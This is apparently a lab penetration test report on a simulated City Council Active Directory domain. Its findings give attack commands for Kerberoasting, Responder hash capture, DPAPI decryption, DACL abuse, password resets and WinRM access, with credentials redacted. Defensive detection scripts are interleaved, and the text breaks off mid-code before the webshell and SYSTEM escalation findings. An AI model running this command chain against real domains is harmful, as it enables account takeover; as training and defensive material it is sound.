# City Council | Pentest Report

{% embed url="https://www.hacksmarter.org/courses/3a4958cb-8c5b-414c-8efc-eb28b14fd1bc" %}

## Internal Active Directory Penetration Test

## City Council Infrastructure

| Field           | Value                             |
| --------------- | --------------------------------- |
| Client          | City Council                      |
| Assessment Type | Internal Network Penetration Test |
| Testing Model   | Black Box                         |
| Environment     | HackSmarterLabs                   |
| Assessor        | Dragkob                           |
| Date            | March 2026                        |

***

## Table of Contents

1. Executive Summary
2. Scope of Engagement
3. Business Impact
4. Methodology
5. Risk Rating Methodology
6. Attack Path Overview
7. Summary of Findings
   * F-01 – Cleartext LDAP Credential Exposure
   * F-02 – Kerberoastable Service Accounts
   * F-03 – Writable SMB Share
   * F-04 – NTLM Credential Capture
   * F-05 – Weak Password Policy
   * F-06 – Backup Archive Exposure
   * F-07 – PowerShell History Credential Exposure
   * F-08 – DPAPI Credential Extraction
   * F-09 – Active Directory ACL Misconfiguration
   * F-10 – Active Directory Privilege Escalation (web\_admin)
   * F-11 – IIS File Upload Leading to Remote Code Execution
   * F-12 – Privilege Escalation to NT AUTHORITY\SYSTEM
8. Tools Used
9. Conclusion

***

## Executive Summary

An internal penetration test was conducted against the City Council Active Directory environment to assess the organization's resilience against internal threats.

During the assessment, the tester successfully compromised the Domain Controller and obtained `NT AUTHORITY\SYSTEM` privileges through a chained series of vulnerabilities including:

* Cleartext LDAP credential exposure
* Kerberos service ticket abuse
* NTLM credential capture
* Weak password cracking
* Backup archive exposure
* DPAPI credential extraction
* Active Directory ACL misconfiguration
* Web server file upload abuse
* Privilege escalation vulnerabilities

These weaknesses allowed a simulated attacker to progress from unauthenticated network access to full domain compromise.

Failure to remediate these issues could allow attackers to:

* Obtain domain administrator privileges
* Access sensitive municipal records
* Deploy ransomware
* Manipulate Active Directory permissions
* Persist within the network environment

Immediate remediation is recommended.

***

## Scope of Engagement

| Asset            | Role                           | IP          | Domain     |
| ---------------- | ------------------------------ | ----------- | ---------- |
| DC-CC.city.local | Domain Controller / Web Server | 10.1.134.65 | city.local |

{% hint style="info" %}
No denial-of-service attacks or destructive testing were performed during this engagement.
{% endhint %}

***

## Business Impact

The vulnerabilities identified during this assessment allow an attacker to progress from unauthenticated network access to full Domain Controller compromise.

Successful exploitation could enable attackers to:

* Obtain Domain Administrator-level control
* Access sensitive municipal records
* Manipulate Active Directory permissions
* Deploy ransomware across the network
* Disable security controls
* Maintain persistent access within the environment

Because the Domain Controller manages authentication and authorization for the entire network, compromise of this system effectively results in complete control of the City Council infrastructure.

Failure to remediate these issues may expose the organization to data breaches, operational disruption, and reputational damage.

***

## Methodology

Testing followed an industry-standard methodology aligned with:

* PTES
* OWASP Testing Guide
* NIST SP 800-115

| Phase                | Description                                 |
| -------------------- | ------------------------------------------- |
| Reconnaissance       | Identification of live hosts and services   |
| Enumeration          | Discovery of domain objects and credentials |
| Exploitation         | Abuse of vulnerabilities                    |
| Credential Access    | Password cracking and credential extraction |
| Lateral Movement     | Movement between accounts                   |
| Privilege Escalation | Obtaining administrative privileges         |
| Post Exploitation    | Demonstrating full compromise               |

***

## Risk Rating Methodology

Vulnerabilities are scored using the Common Vulnerability Scoring System (CVSS v3.1).

| Severity | CVSS Score |
| -------- | ---------- |
| Critical | 9.0 – 10.0 |
| High     | 7.0 – 8.9  |
| Medium   | 4.0 – 6.9  |
| Low      | 0.1 – 3.9  |

Risk severity considers:

* Attack complexity
* Privilege requirements
* User interaction
* Confidentiality impact
* Integrity impact
* Availability impact

***

## Attack Path Overview

The domain compromise occurred through the following chain:

```
F-01  Cleartext LDAP Credential Exposure
        ↓
Compromise of svc_services_portal service account
        ↓
Active Directory Enumeration (BloodHound)
        ↓
F-02  Kerberoasting Attack
        ↓
Compromise of clerk.john account
        ↓
F-03  Writable SMB Share (Uploads)
        ↓
F-04  NTLMv2 Credential Capture via Responder
        ↓
Compromise of jon.peters account
        ↓
F-05  Kerberoasting Additional Users
        ↓
Compromise of nina.soto and maria.clerk accounts
        ↓
F-06  Backup Share Exposure
        ↓
Extraction of User Profile Backups
        ↓
F-07  PowerShell History Credential Exposure
        ↓
F-08  DPAPI Credential Decryption
        ↓
Compromise of emma.hayes account
        ↓
F-09  Active Directory ACL Abuse (WriteDACL → FullControl)
        ↓
Password Reset and Enablement of sam.brooks account
        ↓
Remote Access via WinRM
        ↓
F-10  Active Directory Privilege Escalation (GenericWrite → web_admin)
        ↓
Reset of web_admin account password
        ↓
F-11  IIS File Upload → ASPX Webshell Execution
        ↓
Remote Code Execution on Domain Controller
        ↓
F-12  Privilege Escalation via SeImpersonate (Named Pipe Impersonation)
        ↓
NT AUTHORITY\SYSTEM on Domain Controller
```

***

## Summary of Findings

| ID   | Vulnerability                                                            | Severity | CVSS |
| ---- | ------------------------------------------------------------------------ | -------- | ---- |
| F-01 | Cleartext LDAP Credential Exposure                                       | High     | 8.2  |
| F-02 | Kerberoastable Service Accounts                                          | High     | 8.0  |
| F-03 | Writable SMB Share                                                       | Medium   | 6.5  |
| F-04 | NTLM Credential Capture                                                  | High     | 8.5  |
| F-05 | Weak Password Policy                                                     | High     | 7.8  |
| F-06 | Backup Archive Exposure                                                  | Medium   | 6.9  |
| F-07 | PowerShell History Credential Exposure                                   | High     | 8.1  |
| F-08 | DPAPI Credential Extraction                                              | High     | 8.4  |
| F-09 | Active Directory ACL Misconfiguration                                    | Critical | 9.3  |
| F-10 | Active Directory Privilege Escalation via GenericWrite on web\_admin     | Critical | 9.8  |
| F-11 | IIS File Upload Leading to Remote Code Execution                         | Critical | 9.8  |
| F-12 | Privilege Escalation to NT AUTHORITY\SYSTEM via Named Pipe Impersonation | Critical | 9.8  |

***

## F-01 – Cleartext LDAP Credential Exposure

**Severity:** High\
**CVSS:** 8.2\
**Vector:** AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

### Description

The municipal web application used by the City Council communicates with the Domain Controller through LDAP authentication. During testing it was discovered that the application sends authentication credentials over an unencrypted LDAP connection. Because LDAP traffic was transmitted in plaintext, credentials were observable in network traffic. An attacker monitoring network traffic could intercept the authentication request and extract valid domain credentials.

<figure><img src="/files/aPYn4zWlRDky64OJSDWP" alt=""><figcaption></figcaption></figure>

### Technical Evidence

Network traffic was captured using Wireshark while submitting a request through the municipal service portal. Captured authentication string:

```
DPUSER=svc_services_portal
PASS=[REDACTED]
DOMAIN=city.local
```

The captured credentials belonged to the service account:

```
svc_services_portal
```

These credentials allowed authenticated enumeration of the Active Directory domain.

<figure><img src="/files/WpcHnDMrGfK9yPEPlHzb" alt=""><figcaption></figcaption></figure>

### Impact

Exposure of service account credentials allows attackers to:

* Authenticate to Active Directory
* Enumerate domain users and groups
* Identify privilege escalation paths
* Launch Kerberos attacks such as Kerberoasting

This vulnerability enabled the initial foothold within the domain environment.

### Remediation

* Enforce LDAPS (LDAP over TLS) for all authentication traffic
* Disable plaintext LDAP authentication
* Rotate exposed service account credentials
* Monitor authentication logs for suspicious activity
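As an added example (not part of the original report), this is the check a defender would run before enforcing LDAPS to learn which accounts and hosts are still binding in the clear: parse Directory Service Event ID 2889 messages and group them by identity and client. The event bodies are constructed sample data; a DC only emits 2889 once the NTDS diagnostic `16 LDAP Interface Events` is set to 2.

```python
import re
from collections import Counter
from typing import Optional

# Constructed message bodies of Directory Service Event ID 2889 (sample data, not
# taken from the engagement). A DC only logs 2889 when the NTDS diagnostic
# "16 LDAP Interface Events" is set to 2. Binding Type 0 = SASL bind without
# signing, 1 = simple bind over a cleartext (non-TLS) LDAP connection.
_HEADER = (
    "The following client performed a SASL (Negotiate/Kerberos/NTLM/Digest) LDAP bind "
    "without requesting signing (integrity verification), or performed a simple bind "
    "over a clear text (non-SSL/TLS-encrypted) LDAP connection.\n"
)
SAMPLE_2889_EVENTS = [
    _HEADER + "Client IP address:\n10.1.134.70:51234\n"
    "Identity the client attempted to authenticate as:\nCITY\\svc_services_portal\n"
    "Binding Type:\n1",
    _HEADER + "Client IP address:\n10.1.134.70:51301\n"
    "Identity the client attempted to authenticate as:\nCITY\\svc_services_portal\n"
    "Binding Type:\n1",
    _HEADER + "Client IP address:\n10.1.134.88:60017\n"
    "Identity the client attempted to authenticate as:\nCITY\\jon.peters\n"
    "Binding Type:\n0",
]

SIMPLE_BIND_CLEARTEXT = 1   # the password itself crosses the wire in the clear
SASL_UNSIGNED = 0           # no password leak, but the session can be relayed

_RE_CLIENT = re.compile(r"Client IP address:\s*([\d.]+):(\d+)")
_RE_IDENTITY = re.compile(r"authenticate as:\s*(\S+)")
_RE_TYPE = re.compile(r"Binding Type:\s*(\d)")


def parse_2889(message: str) -> Optional[dict]:
    """Pull client IP, bound identity and binding type out of one 2889 message."""
    client = _RE_CLIENT.search(message)
    identity = _RE_IDENTITY.search(message)
    btype = _RE_TYPE.search(message)
    if not (client and identity and btype):
        return None          # not a 2889 body we understand; skip rather than guess
    return {"client_ip": client.group(1), "identity": identity.group(1),
            "binding_type": int(btype.group(1))}


def summarize_insecure_binds(messages) -> list:
    """Group events by (identity, client, binding type), most frequent first."""
    counts = Counter()
    for msg in messages:
        rec = parse_2889(msg)
        if rec:
            counts[(rec["identity"], rec["client_ip"], rec["binding_type"])] += 1
    return [{"identity": i, "client_ip": c, "binding_type": t, "count": n}
            for (i, c, t), n in sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))]


def cleartext_password_exposures(messages) -> list:
    """Only the simple binds: these are the rows whose passwords a sniffer would see."""
    return [r for r in summarize_insecure_binds(messages)
            if r["binding_type"] == SIMPLE_BIND_CLEARTEXT]


if __name__ == "__main__":
    for row in cleartext_password_exposures(SAMPLE_2889_EVENTS):
        print(f"{row['identity']} from {row['client_ip']}: "
              f"{row['count']} cleartext simple bind(s)")
```

Once the list is empty, the "Domain controller: LDAP server signing requirements" policy can be set to Require signing, which makes the DC reject simple binds that arrive without TLS.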

***

## F-02 – Kerberoastable Service Accounts

**Severity:** High\
**CVSS:** 8.0\
**Vector:** AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

### Description

Active Directory enumeration revealed multiple accounts configured with Service Principal Names (SPNs).

Accounts with SPNs can be targeted using a Kerberos attack technique known as Kerberoasting, where attackers request service tickets and attempt to crack the encrypted ticket offline to recover the account password.

### Technical Evidence

Kerberos service tickets were requested using:

```
GetUserSPNs.py
```

Example command:

```
GetUserSPNs.py city.local/svc_services_portal:[REDACTED] -dc-ip 10.1.134.65 -request
```

The following Kerberoastable account was identified: `clerk.john`

Extracted Kerberos ticket hashes were cracked offline using:

```
john --wordlist=rockyou.txt hashes.txt
```

Recovered passwords:

```
clerk.john : [REDACTED]
```

### Impact

Successful Kerberoasting allows attackers to recover service account passwords without generating failed-authentication events, because requesting a service ticket is a normal Kerberos operation and the cracking happens offline.

These credentials can be used to:

* Authenticate to domain services
* Enumerate additional domain resources
* Escalate privileges
* Move laterally within the network

### Remediation

* Use long complex passwords for service accounts
* Implement Managed Service Accounts (MSA / gMSA)
* Monitor Kerberos ticket requests
* Rotate service account credentials regularly

***

## F-03 – Writable SMB Share

**Severity:** Medium\
**CVSS:** 6.5\
**Vector:** AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N

### Description

The Domain Controller exposes an SMB share named `Uploads` which allows authenticated users to upload files.

The account `clerk.john` was able to write files to this share.

Writable shares can be abused by attackers to upload malicious files designed to trigger authentication attempts from other users.

### Technical Evidence

SMB enumeration using nxc revealed:

```
Uploads (READ, WRITE)
```

Example enumeration command:

```
nxc smb 10.1.134.65 -u clerk.john -p [REDACTED] --shares
```

Files present within the share included internal documentation such as:

```
Staff_Contacts.txt
Council_Draft.txt
```

The attacker was able to upload arbitrary files to the share.

### Impact

Writable SMB shares can be abused to:

* Deliver malicious files
* Trigger authentication attempts
* Capture NTLM credentials
* Execute phishing attacks within internal networks

### Remediation

* Remove write permissions from non-administrative users
* Apply least privilege access control
* Monitor file uploads within SMB shares

***

## F-04 – NTLM Credential Capture

**Severity:** High\
**CVSS:** 8.5\
**Vector:** AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N

### Description

By uploading authentication-triggering files to the writable SMB share using `NTLMTheft.py`, the attacker was able to capture NTLM authentication hashes from another domain user.

### Technical Evidence

Authentication capture was performed using Responder.

```
responder -I eth0
```

Captured NTLMv2 hash:

```
CITY\jon.peters
```

The captured hash was cracked offline.

<figure><img src="/files/wqgHC18UChZuEl8F2YSI" alt=""><figcaption></figcaption></figure>

### Impact

Compromised credentials allow attackers to:

* Authenticate to internal systems
* Access network shares
* Perform additional enumeration
* Escalate privileges within the domain

### Remediation

* Disable LLMNR and NetBIOS name resolution
* Enforce SMB signing
* Implement NTLM authentication restrictions
* Deploy monitoring for poisoning attacks

***

## F-05 – Weak Password Policy

**Severity:** High\
**CVSS:** 7.8\
**Vector:** AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

### Description

Several domain accounts were protected by weak passwords that could be cracked using publicly available wordlists.

After compromising the account jon.peters through NTLM credential capture (F-04), the attacker performed additional Active Directory enumeration.

Using the compromised credentials, a Kerberoasting attack was executed to request Kerberos service tickets for accounts with Service Principal Names (SPNs). These service tickets can be exported and cracked offline to recover plaintext passwords.

Two service accounts were identified as Kerberoastable and their service ticket hashes were successfully cracked.

### Technical Evidence

Kerberos service tickets were requested using the compromised credentials:

```
targetedKerberoast.py -d city.local -u jon.peters -p [REDACTED] --dc-ip 10.1.134.65
```

Recovered Kerberos service ticket hashes were saved to: `hashes.txt`

The hashes were cracked offline using John the Ripper:

```
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
```

Recovered credentials:

| Account     | Password    |
| ----------- | ----------- |
| maria.clerk | \[REDACTED] |
| nina.soto   | \[REDACTED] |

These credentials provided additional access to internal network resources, including the Backups SMB share.

### Impact

Weak passwords significantly reduce the effort required for attackers to compromise domain accounts once password hashes are obtained.

An attacker with the ability to request Kerberos service tickets can perform offline password cracking attacks without generating authentication failures or alerts.

Successful cracking of these credentials enabled the attacker to:

* Access additional SMB shares
* Retrieve sensitive backup archives
* Extract further credential material
* Continue privilege escalation within the domain

### Remediation

* Enforce strong password complexity requirements
* Require longer passwords (minimum 14 characters)
* Implement password expiration and rotation policies
* Use Managed Service Accounts (gMSA) for service accounts
* Monitor Kerberos ticket requests for suspicious activity
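For F-02 and F-05 together, an added detection example (not part of the report) over constructed Event ID 4769 records: it flags RC4 service tickets issued for user accounts, and a single requester pulling tickets for several distinct service accounts inside a short window, which is the footprint left by the `GetUserSPNs.py` and `targetedKerberoast.py` runs above. The account `svc_backup` and the client addresses are invented sample values.

```python
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

RC4_HMAC = 0x17   # TicketEncryptionType for RC4-HMAC: crackable directly against the NT hash


@dataclass
class TgsRequest:
    """The Event ID 4769 fields this detection needs."""
    time: datetime
    account: str      # TargetUserName: who asked for the ticket
    service: str      # ServiceName: the account owning the SPN
    enc_type: int     # TicketEncryptionType
    client_ip: str    # IpAddress
    status: str       # 0x0 = ticket issued


def _t(hms: str) -> datetime:
    return datetime(2026, 3, 10, *map(int, hms.split(":")))


# Constructed 4769 records (sample data; svc_backup and the workstation IPs are
# invented). The 14:02 burst is what a single Kerberoasting run looks like in the log.
SAMPLE_4769 = [
    TgsRequest(_t("09:15:02"), "alice.ng@CITY.LOCAL", "DC-CC$", 0x12, "10.1.134.80", "0x0"),
    TgsRequest(_t("14:02:11"), "jon.peters@CITY.LOCAL", "maria.clerk", RC4_HMAC, "10.1.134.70", "0x0"),
    TgsRequest(_t("14:02:12"), "jon.peters@CITY.LOCAL", "nina.soto", RC4_HMAC, "10.1.134.70", "0x0"),
    TgsRequest(_t("14:02:12"), "jon.peters@CITY.LOCAL", "svc_backup", RC4_HMAC, "10.1.134.70", "0x0"),
    TgsRequest(_t("14:02:13"), "jon.peters@CITY.LOCAL", "krbtgt", 0x12, "10.1.134.70", "0x0"),
    TgsRequest(_t("16:40:00"), "bob.reyes@CITY.LOCAL", "svc_backup", 0x12, "10.1.134.91", "0x0"),
]


def is_roastable_request(ev: TgsRequest) -> bool:
    """Only issued tickets for user (non-machine, non-krbtgt) service accounts matter."""
    return (ev.status == "0x0" and ev.service.lower() != "krbtgt"
            and not ev.service.endswith("$"))


def detect_kerberoasting(events, window=timedelta(minutes=5), min_distinct=3):
    """Two complementary signals:
    - rc4_service_ticket: an RC4 ticket for a user service account (downgraded enc type)
    - spn_burst: one requester pulling tickets for >= min_distinct different service
      accounts inside `window`, regardless of encryption type (catches AES roasting too)."""
    alerts = []
    per_requester = defaultdict(list)
    for ev in sorted(events, key=lambda e: e.time):
        if not is_roastable_request(ev):
            continue
        if ev.enc_type == RC4_HMAC:
            alerts.append({"rule": "rc4_service_ticket", "requester": ev.account,
                           "service": ev.service, "client_ip": ev.client_ip, "time": ev.time})
        per_requester[ev.account].append(ev)
    for requester, evs in per_requester.items():
        for i, start in enumerate(evs):                      # sliding window from each request
            in_window = [e for e in evs[i:] if e.time - start.time <= window]
            distinct = {e.service.lower() for e in in_window}
            if len(distinct) >= min_distinct:
                alerts.append({"rule": "spn_burst", "requester": requester,
                               "services": sorted(distinct), "client_ip": start.client_ip,
                               "time": start.time})
                break                                        # one alert per requester
    return alerts


if __name__ == "__main__":
    for a in detect_kerberoasting(SAMPLE_4769):
        print(a["rule"], a["requester"], a.get("service") or a["services"])
```

On the environment side, the RC4 signal disappears once service accounts are set to AES-only (`msDS-SupportedEncryptionTypes`) or moved to gMSA, which is why the burst rule is kept as a second, encryption-independent check.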

***

## F-06 – Backup Archive Exposure

**Severity:** Medium\
**CVSS:** 6.9\
**Vector:** AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

### Description

The Backups SMB share contained user profile backup archives accessible to a standard domain user. These archives contained sensitive user data including emails, credential artifacts, and configuration files.

### Technical Evidence

Accessible files included:

```
sam.brooks_ProfileBackup_0729.wim
clerk.john_ProfileBackup_0729.wim
```

These archives were downloaded and extracted during testing.

### Impact

Backup archives may contain:

* credentials
* authentication tokens
* sensitive corporate information

This information can assist attackers in privilege escalation.

### Remediation

* Restrict access to backup storage
* Encrypt backup archives
* Implement access auditing for backup shares

***

## F-07 – PowerShell History Credential Exposure

**Severity:** High\
**CVSS:** 8.1\
**Vector:** AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

### Description

Analysis of extracted profile backups revealed PowerShell command history files containing credentials. Storing passwords within PowerShell command history exposes sensitive authentication information to attackers.

### Technical Evidence

PowerShell history file identified:

```
ConsoleHost_history.txt
```

The file contained commands including credentials used for administrative tasks.

Recovered credentials:

| Account    | Password    |
| ---------- | ----------- |
| emma.hayes | \[REDACTED] |

<figure><img src="/files/RpNejrDD7xyINDobQDW8" alt=""><figcaption></figcaption></figure>

### Impact

Exposure of credentials in PowerShell history allows attackers to recover sensitive authentication material without requiring password cracking or privilege escalation.

Because the compromised account possessed elevated Active Directory privileges, this exposure enabled the attacker to:

* Modify Active Directory permissions
* Reset user passwords
* Enable disabled accounts
* Escalate privileges within the domain

### Remediation

* Avoid including passwords directly in PowerShell commands
* Use secure credential objects (`Get-Credential`)
* Disable PowerShell history logging on administrative systems where appropriate
* Periodically clear PowerShell history files
* Implement privileged access management solutions
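An added example (not from the report) of the sweep a defender can run over exported `ConsoleHost_history.txt` files to find plaintext credentials without copying the secrets into the findings. The history content is constructed sample data and the password values in it are invented; PSReadLine writes the real file under `%APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\`.

```python
import re

# Constructed ConsoleHost_history.txt content (sample, not the engagement's file).
SAMPLE_HISTORY = r"""Get-ADUser -Filter * -SearchBase 'OU=CityOps,DC=city,DC=local'
$pw = ConvertTo-SecureString 'Winter2026!' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('city\emma.hayes', $pw)
Invoke-Command -ComputerName DC-CC -Credential $cred -ScriptBlock { hostname }
net use \\DC-CC\Backups /user:city\svc_backup B4ckup#2026
Set-ADAccountPassword -Identity sam.brooks -NewPassword $pw -Reset
Get-Service Spooler
"""

# Each pattern captures the secret in the group "secret" so the finding can be reported
# with the value masked. A token starting with "$" is a variable, not a literal, and is
# deliberately not treated as a secret (line 6 above is therefore not reported).
_LITERAL = r"(?P<secret>(?!\$)(?:'[^']*'|\"[^\"]*\"|\S+))"
CREDENTIAL_PATTERNS = {
    "ConvertTo-SecureString -AsPlainText literal": re.compile(
        r"ConvertTo-SecureString\s+" + _LITERAL + r"(?=.*-AsPlainText)", re.I),
    "-Password/-NewPassword literal": re.compile(
        r"-(?:Account|New)?Password\s+" + _LITERAL, re.I),
    "net use /user: with password": re.compile(
        r"\bnet\s+use\s+\S+\s+/user:\S+\s+" + _LITERAL, re.I),
}


def scan_history(text: str) -> list:
    """Return one finding per history line that carries a literal credential.
    The command is returned with the secret replaced by [REDACTED]."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, pattern in CREDENTIAL_PATTERNS.items():
            m = pattern.search(line)
            if m:
                redacted = line[:m.start("secret")] + "[REDACTED]" + line[m.end("secret"):]
                findings.append({"line": lineno, "pattern": name, "command": redacted})
                break                       # one finding per line is enough
    return findings


def scan_history_file(path: str) -> list:
    """Convenience wrapper for a file pulled from a profile backup or a live host."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return scan_history(fh.read())


if __name__ == "__main__":
    for f in scan_history(SAMPLE_HISTORY):
        print(f"line {f['line']}: {f['pattern']}: {f['command']}")
```

For administrative sessions, `Set-PSReadLineOption -HistorySaveStyle SaveNothing` stops the file being written in the first place, which is the durable form of the "disable history logging" remediation above.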

***

## F-08 – DPAPI Credential Extraction

**Severity:** High\
**CVSS:** 8.4\
**Vector:** AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

### Description

Credential artifacts stored within user profiles were protected using the Windows Data Protection API (DPAPI). Because the attacker obtained the user password, DPAPI master keys could be decrypted, revealing stored credentials.

### Technical Evidence

Credential files extracted:

```
AppData\Roaming\Microsoft\Credentials
```

Master key extracted from:

```
AppData\Roaming\Microsoft\Protect
```

Credentials were decrypted using:

```
impacket-dpapi
```

Recovered credentials:

```
emma.hayes : [REDACTED]
```

<figure><img src="/files/dXywJJ63QZCuQYdkPstS" alt=""><figcaption></figcaption></figure>

### Impact

DPAPI credential recovery allows attackers to obtain stored passwords and authentication tokens.

### Remediation

* Avoid storing credentials locally
* Use credential vaults or secure authentication mechanisms
* Monitor credential access activity

***

## F-09 – Active Directory ACL Misconfiguration

**Severity:** Critical\
**CVSS:** 9.3\
**Vector:** AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N

### Description

The domain account `emma.hayes` possessed excessive privileges within Active Directory. Specifically, the account had WriteDACL permissions on the Organizational Unit (OU) **`CityOps`**. WriteDACL permissions allow a user to modify the Access Control List (ACL) of an Active Directory object.

An attacker who compromises an account with WriteDACL permissions can modify the ACL to grant themselves Full Control over the object and any objects within it. During the assessment, the attacker abused this permission to grant **FullControl** rights to the `emma.hayes` account on the CityOps OU, enabling administrative control over user accounts contained within that OU. This allowed the attacker to reset passwords for multiple domain accounts within the OU and gain unauthorized access.

### Technical Evidence

Initial enumeration revealed that the account **emma.hayes** possessed the permission:

```
WriteDACL on OU=CityOps
```

The attacker modified the ACL of the CityOps OU using **Impacket dacledit**:

```
impacket-dacledit -action 'write' -rights 'FullControl' -inheritance \
-principal 'EMMA.HAYES' \
-target-dn 'OU=CITYOPS,DC=CITY,DC=LOCAL' \
'city.local'/'EMMA.HAYES':'[REDACTED]'
```

After obtaining **FullControl** over the OU, the attacker reset passwords for user accounts located within the CityOps OU:

```
net rpc password sam.brooks \
-U 'city.local/emma.hayes%[REDACTED]' \
-S 10.1.1.109
```

```
net rpc password ALEX.KING \
-U 'city.local/emma.hayes%[REDACTED]' \
-S 10.1.1.109
```

```
net rpc password RITA.CHO \
-U 'city.local/emma.hayes%[REDACTED]' \
-S 10.1.1.109
```

Password resets were successful, granting the attacker control of the affected accounts. However, the `sam.brooks` account was initially disabled.

Verification attempt:

```
nxc smb 10.1.1.109 -u sam.brooks -p '[REDACTED]' --shares
```

Result:

```
STATUS_ACCOUNT_DISABLED
```

The attacker then enabled the account using **bloodyAD**:

```
bloodyAD --host 10.1.1.109 -d city.local \
-u emma.hayes -p '[REDACTED]' \
remove uac 'sam.brooks' -f ACCOUNTDISABLE
```

Output:

```
ACCOUNTDISABLE flag removed from sam.brooks
```

After enabling the account, the attacker authenticated successfully using WinRM:

```
evil-winrm -u sam.brooks -p [REDACTED] -i 10.1.1.109
```

This provided remote command execution on the Domain Controller.

### Impact

Improper Active Directory permissions allow attackers to escalate privileges and gain control over additional domain accounts.

By abusing the WriteDACL permission, the attacker was able to:

* Grant themselves FullControl over the CityOps OU
* Reset passwords for multiple user accounts
* Enable disabled accounts
* Obtain remote shell access to the Domain Controller

This vulnerability enabled privilege escalation and lateral movement within the domain, ultimately leading to full system compromise.

### Remediation

* Review Active Directory ACL permissions regularly
* Remove unnecessary WriteDACL and GenericWrite privileges
* Implement the principle of least privilege
* Use Privileged Access Management (PAM) for administrative accounts
* Monitor changes to Active Directory permissions

***

## F-10 – Active Directory Privilege Escalation via GenericWrite on web\_admin

**Severity:** Critical\
**CVSS:** 9.8\
**Vector:** AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N

### Description

Active Directory enumeration revealed that the account emma.hayes possessed GenericWrite permissions on the `web_admin` user account. GenericWrite permissions allow modification of attributes of the target object. This includes changing the object's distinguishedName, enabling attackers to move the object to another Organizational Unit (OU).

During the assessment, the attacker abused this permission to move the web\_admin account into the CityOps OU, which was already controlled by the attacker through the WriteDACL abuse described in F-09. Once the account was moved into the controlled OU, the attacker reset the password for the `web_admin` account and gained control of the account.

### Technical Evidence

The attacker moved the user object into the CityOps OU:

```bash
cat <<EOF | ldapmodify -x -H ldap://10.1.1.109 -D "emma.hayes@city.local" -w '[REDACTED]'
dn: CN=Web Admin,OU=Quarantine,DC=city,DC=local
changetype: moddn
newrdn: CN=Web Admin
deleteoldrdn: 1
newsuperior: OU=CityOps,DC=city,DC=local
EOF
```

After moving the object, the attacker reset the password for the account:

```bash
net rpc password web_admin '[REDACTED]' -U city.local/emma.hayes%'[REDACTED]' -S 10.1.1.109
```

This provided access as the `web_admin` account.

### Impact

Abuse of GenericWrite permissions allowed the attacker to take over a privileged service account.

### Remediation

* Audit Active Directory permissions regularly
* Remove unnecessary GenericWrite permissions
* Restrict who can modify privileged service accounts
* Implement tiered administrative access models
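For F-09 and F-10 together, an added example (not the report's own tooling) of auditing an object's DACL from its SDDL string, as returned by `(Get-Acl 'AD:\OU=CityOps,DC=city,DC=local').Sddl`, to flag WriteDACL, WriteOwner, GenericAll, GenericWrite or unscoped WriteProperty granted to non-administrative principals. The two SDDL strings, the domain SID, the RIDs and the attribute GUID are constructed sample data, with RID 1105 standing in for `emma.hayes`.

```python
import re

# SDDL access-right mnemonics (the subset used on directory objects), per MS-DTYP.
RIGHTS = {
    "GA": 0x10000000, "GX": 0x20000000, "GW": 0x40000000, "GR": 0x80000000,
    "WO": 0x00080000, "WD": 0x00040000, "RC": 0x00020000, "SD": 0x00010000,
    "CC": 0x00000001, "DC": 0x00000002, "LC": 0x00000004, "SW": 0x00000008,
    "RP": 0x00000010, "WP": 0x00000020, "DT": 0x00000040, "LO": 0x00000080,
    "CR": 0x00000100,
}
# Rights that let the holder take over the object (and, with CI, everything under it).
TAKEOVER = ("WD", "WO", "GA", "GW")

# Trustees expected to hold such rights on an OU or user object.
TRUSTED_ALIASES = {"DA", "EA", "BA", "SY"}          # Domain/Enterprise Admins, Administrators, SYSTEM
TRUSTED_SIDS = {"S-1-5-32-544", "S-1-5-18"}
TRUSTED_RID_SUFFIXES = ("-512", "-519")

# Constructed SDDL strings (domain SID, RIDs and the attribute GUID are invented).
CITYOPS_OU_SDDL = (
    "O:DAG:DAD:AI"
    "(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)"                       # Domain Admins: full control
    "(A;CI;WD;;;S-1-5-21-1004336348-1177238915-682003330-1105)"  # WriteDACL, inherited by children
    "(A;;RPLCLORC;;;AU)"                                         # Authenticated Users: read
)
WEB_ADMIN_USER_SDDL = (
    "O:DAG:DAD:AI"
    "(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)"
    "(A;;GW;;;S-1-5-21-1004336348-1177238915-682003330-1105)"    # GenericWrite on the user
    "(OA;;WP;bf967a7f-0de6-11d0-a285-00aa003049e2;;"
    "S-1-5-21-1004336348-1177238915-682003330-1108)"            # WriteProperty on one attribute only
)

_ACE_RE = re.compile(r"\(([^)]*)\)")


def parse_rights(field: str) -> int:
    """Convert an SDDL rights field (hex or concatenated 2-letter mnemonics) to a mask."""
    if field.lower().startswith("0x"):
        return int(field, 16)
    if len(field) % 2:
        raise ValueError(f"malformed rights field: {field!r}")
    mask = 0
    for i in range(0, len(field), 2):
        mask |= RIGHTS[field[i:i + 2]]      # KeyError on a mnemonic we do not know
    return mask


def parse_dacl(sddl: str) -> list:
    """Return the ACEs of the D: section as dicts (empty if there is no DACL)."""
    m = re.search(r"D:(?:P|AR|AI)*((?:\([^)]*\))*)", sddl)
    aces = []
    for body in _ACE_RE.findall(m.group(1) if m else ""):
        f = body.split(";")
        if len(f) != 6:
            raise ValueError(f"malformed ACE: ({body})")
        flags = {f[1][i:i + 2] for i in range(0, len(f[1]), 2)}
        aces.append({"type": f[0], "flags": flags, "rights": parse_rights(f[2]),
                     "object_guid": f[3], "inherit_guid": f[4], "trustee": f[5]})
    return aces


def is_trusted(trustee: str) -> bool:
    return (trustee in TRUSTED_ALIASES or trustee in TRUSTED_SIDS
            or trustee.endswith(TRUSTED_RID_SUFFIXES))


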